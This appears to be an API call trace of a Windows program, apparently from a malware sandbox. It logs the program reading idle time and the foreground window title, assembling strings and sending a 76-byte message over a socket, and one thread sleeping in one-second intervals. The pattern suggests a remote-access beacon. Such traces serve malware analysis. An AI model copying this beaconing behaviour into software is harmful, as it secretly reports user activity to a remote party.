[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] free (_Block=0x2200560)
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250ff60
[0230.916] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0230.916] GetTickCount () returned 0x1d48d76
[0230.916] _itoa (in: _Val=30707062, _DstBuf=0x250f868, _Radix=10 | out: _DstBuf="30707062") returned="30707062"
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x250ff3c
[0230.916] GetLastInputInfo (in: plii=0x250f874 | out: plii=0x250f874*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0230.916] GetTickCount () returned 0x1d48d76
[0230.916] _itoa (in: _Val=5500, _DstBuf=0x250f850, _Radix=10 | out: _DstBuf="5500") returned="5500"
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x250ff1c
[0230.916] GetForegroundWindow () returned 0x103ca
[0230.917] GetWindowTextW (in: hWnd=0x103ca, lpString=0x250f66c, nMaxCount=512 | out: lpString="Nothing Left") returned 12
[0230.917] ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z () returned 0x250fefc
[0230.917] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0xc
[0230.917] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x250f854
[0230.917] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0xc
[0230.917] ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ () returned 0x22081fa
[0230.917] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206e49
[0230.917] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250feec
[0230.917] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.917] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x250fea4
[0230.917] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250feb4
[0230.917] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250fec4
[0230.917] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250fedc
[0230.917] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250fe84
[0230.918] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250ff50
[0230.918] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250ff0c
[0230.918] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250f88c
[0230.918] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f86c
[0230.918] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x3d
[0230.918] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x250f850
[0230.918] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x2207154
[0230.918] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250f840
[0230.918] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f86c
[0230.918] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.918] ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ () returned 0x0
[0230.918] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x4c
[0230.918] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22085f9
[0230.918] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x250f818
[0230.918] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2208669
[0230.918] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f840
[0230.918] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.918] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x4c
[0230.918] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2208669
[0230.918] send (s=0x1e0, buf=0x2208669*, len=76, flags=0) returned 76
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.919] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206ff9
[0230.919] atoi (_Str="20") returned 20
[0230.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x402823, lpParameter=0x415a30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b8
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.923] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.924] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.924] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.924] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.924] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.924] free (_Block=0x2207bb8)
[0230.924] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
Thread:
id = 105
os_tid = 0x10c0
[0230.927] Sleep (dwMilliseconds=0x3e8)
[0231.937] Sleep (dwMilliseconds=0x3e8)
[0232.954] Sleep (dwMilliseconds=0x3e8)
[0233.970] Sleep (dwMilliseconds=0x3e8)
[0234.983] Sleep (dwMilliseconds=0x3e8)
[0235.998] Sleep (dwMilliseconds=0x3e8)
[0237.014] Sleep (dwMilliseconds=0x3e8)
[0238.031] Sleep (dwMilliseconds=0x3e8)
[0239.046] Sleep (dwMilliseconds=0x3e8)
[0240.058] Sleep (dwMilliseconds=0x3e8)
[0241.074] Sleep (dwMilliseconds=0x3e8)
[0242.080] Sleep (dwMilliseconds=0x3e8)
[0243.093] Sleep (dwMilliseconds=0x3e8)
[0244.446] Sleep (dwMilliseconds=0x3e8)
[0245.457] Sleep (dwMilliseconds=0x3e8)
Thread:
id = 106
os_tid = 0x1174
[0240.620] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250fe94
[0240.620] SetEvent (hEvent=0x2a8) returned 1
[0240.621] CloseHandle (hObject=0x2a8) returned 1
[0240.622] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f88c
[0240.622] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f87c
[0240.622] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x250f85c
[0240.622] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x11
[0240.622] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x4
[0240.622] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x250f83c
[0240.622] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f85c
[0240.622] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.622] ??2@YAPAXI@Z () returned 0x2202ea8
[0240.622] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202ea8
[0240.622] free (_Block=0x0)
[0240.622] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0240.622] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x11
[0240.622] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xa
[0240.622] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x250f83c
[0240.622] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f85c
[0240.622] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.622] ??2@YAPAXI@Z () returned 0x22027a8
[0240.622] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22027a8
[0240.622] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22027b8
[0240.622] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.622] free (_Block=0x2202ea8)
[0240.622] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0240.622] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x11
[0240.622] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xffffffff
[0240.622] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x250f83c
[0240.622] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f85c
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??2@YAPAXI@Z () returned 0x2200560
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200560
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200570
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200580
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] free (_Block=0x22027a8)
[0240.623] ??2@YAPAXI@Z () returned 0x22081a8
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22081a8
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22081b8
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22081c8
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] free (_Block=0x2200560)
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250ff60
[0240.623] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0240.623] GetTickCount () returned 0x1d4b35d
[0240.623] _itoa (in: _Val=30716765, _DstBuf=0x250f868, _Radix=10 | out: _DstBuf="30716765") returned="30716765"
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x250ff3c
[0240.623] GetLastInputInfo (in: plii=0x250f874 | out: plii=0x250f874*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0240.623] GetTickCount () returned 0x1d4b35d
[0240.623] _itoa (in: _Val=6172, _DstBuf=0x250f850, _Radix=10 | out: _DstBuf="6172") returned="6172"
[0240.623] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x250ff1c
[0240.623] GetForegroundWindow () returned 0x103ca
[0240.625] GetWindowTextW (in: hWnd=0x103ca, lpString=0x250f66c, nMaxCount=512 | out: lpString="Nothing Left") returned 12
[0240.625] ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z () returned 0x250fefc
[0240.625] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0xc
[0240.625] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x250f854
[0240.625] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0xc
[0240.625] ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ () returned 0x22084ca
[0240.625] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206ff9
[0240.625] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250feec
[0240.625] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x250fea4
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250feb4
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250fec4
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250fedc
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250fe84
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250ff50
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250ff0c
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250f88c
[0240.625] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f86c
[0240.625] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x3d
[0240.625] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x250f850
[0240.625] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x2207154
[0240.625] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x250f840
[0240.625] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f86c
[0240.625] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.625] ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ () returned 0x0
[0240.625] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x4c
[0240.625] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22094e9
[0240.625] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x250f818
[0240.625] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2209559
[0240.626] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f840
[0240.626] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.626] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x4c
[0240.626] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2209559
[0240.626] send (s=0x1e0, buf=0x2209559*, len=76, flags=0) returned 76
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ () returned 0x0
[0240.627] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.628] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.628] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206fc9
[0240.628] atoi (_Str="20") returned 20
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
